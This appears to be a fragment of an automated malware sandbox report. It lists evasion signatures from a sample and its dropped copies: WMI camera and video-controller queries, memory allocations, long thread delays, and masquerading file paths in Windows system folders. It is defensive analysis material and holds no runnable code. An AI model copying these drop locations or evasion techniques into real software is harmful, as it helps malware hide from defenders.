                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeMemory allocated: 1E30000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeMemory allocated: 3BC0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeMemory allocated: 1BBC0000 memory commit | memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeMemory allocated: A30000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeMemory allocated: 1A5D0000 memory reserve | memory write watch
                                Source: C:\Program Files\Everything\Everything.exeMemory allocated: 1560000 memory reserve | memory write watch
                                Source: C:\Program Files\Everything\Everything.exeMemory allocated: 1AED0000 memory reserve | memory write watch
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1950000 memory reserve | memory write watch
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 11A0000 memory reserve | memory write watch
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: BD0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1A670000 memory reserve | memory write watch
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeMemory allocated: 31B0000 memory reserve | memory write watch
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeMemory allocated: 1690000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeMemory allocated: 1B200000 memory reserve | memory write watch
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: DA0000 memory reserve | memory write watch
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1A910000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 14D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1B080000 memory reserve | memory write watch
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeMemory allocated: 1770000 memory reserve | memory write watch
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 2AE0000 memory reserve | memory write watch
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeMemory allocated: 1AC70000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
